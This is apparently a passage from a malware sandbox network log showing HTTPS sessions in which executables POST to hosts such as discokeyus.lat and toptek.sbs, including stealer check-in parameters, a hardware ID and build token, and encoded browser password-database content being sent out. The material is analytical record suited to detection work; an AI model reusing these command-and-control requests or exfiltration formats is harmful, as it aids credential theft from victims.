                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:25 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            30192.168.2.449864104.21.21.99443280C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:24 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:17:24 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                                            2024-12-21 21:17:25 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:24 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=surbadgn25okskerc2ov6kuo10; expires=Wed, 16 Apr 2025 15:04:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59B8SRG0j18AuiQIl2T7sp13rnJLgmqSmppnWHpJyq7iXtOAGuWKTJCPwWIm85n2ACA2s2LMAqs7EL%2F7dQ05gWmsOtFbueRkXwKmAXx65bAXRMxqM5lY8NM%2FUljW12ztwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae614394aefa3-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1848&min_rtt=1833&rtt_var=698&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=905&delivery_rate=1593016&cwnd=114&unsent_bytes=0&cid=67f8586ab9b81bbb&ts=897&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:17:25 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                                            2024-12-21 21:17:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            31192.168.2.44986594.130.188.574432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:25 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FU3EKN7YCBIEU3E37GLX
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                            Host: toptek.sbs
                                                                                                                                                                                                                                                            Content-Length: 55081
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-12-21 21:17:25 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 46 55 33 45 4b 4e 37 59 43 42 49 45 55 33 45 33 37 47 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 33 64 62 62 38 36 33 66 65 33 63 37 33 62 36 36 32 62 36 31 63 63 65 30 34 38 33 32 65 62 32 0d 0a 2d 2d 2d 2d 2d 2d 46 55 33 45 4b 4e 37 59 43 42 49 45 55 33 45 33 37 47 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 46 55 33 45 4b 4e 37 59 43 42 49 45 55 33 45 33 37 47 4c 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------FU3EKN7YCBIEU3E37GLXContent-Disposition: form-data; name="token"53dbb863fe3c73b662b61cce04832eb2------FU3EKN7YCBIEU3E37GLXContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------FU3EKN7YCBIEU3E37GLXCont
                                                                                                                                                                                                                                                            2024-12-21 21:17:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:25 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:25 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:26 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-12-21 21:17:26 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            32192.168.2.449867104.21.21.99443944C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:26 UTC269OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=13A5YUSI
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8724
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:17:26 UTC8724OUTData Raw: 2d 2d 31 33 41 35 59 55 53 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 31 33 41 35 59 55 53 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 33 41 35 59 55 53 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 31 33 41 35 59 55 53 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                                                                                                                                                                            Data Ascii: --13A5YUSIContent-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--13A5YUSIContent-Disposition: form-data; name="pid"2--13A5YUSIContent-Disposition: form-data; name="lid"PsFKDg--pablo--13A5YUSIContent-Disposit
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:30 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=laodj1n434rhdl4l3t37i3764k; expires=Wed, 16 Apr 2025 15:04:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ICHlrarQ44oIyohAWBaMdV2Go5vd23OydQGjEvVSUlM9G85wsUjkG12aRfdqLbJAioIVu8afttW8HQPZlVdbLp9pQ%2BfFXAkCLuTKfh3bnh6H9ddqPB%2B30sS1762TckrJgg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae61ffc0cc3f8-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1677&rtt_var=636&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2832&recv_bytes=9651&delivery_rate=1710603&cwnd=160&unsent_bytes=0&cid=1276103669ee9d2a&ts=4913&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            33192.168.2.449868104.21.21.99443280C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:26 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 47
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:17:26 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:31 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=tb5ksbv6qojfl7kkfjkhlt94hr; expires=Wed, 16 Apr 2025 15:04:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
